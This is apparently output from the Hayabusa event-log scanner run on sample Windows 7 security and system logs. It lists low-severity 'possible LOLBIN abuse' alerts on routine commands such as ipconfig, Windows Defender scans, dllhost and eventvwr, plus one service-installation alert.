2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
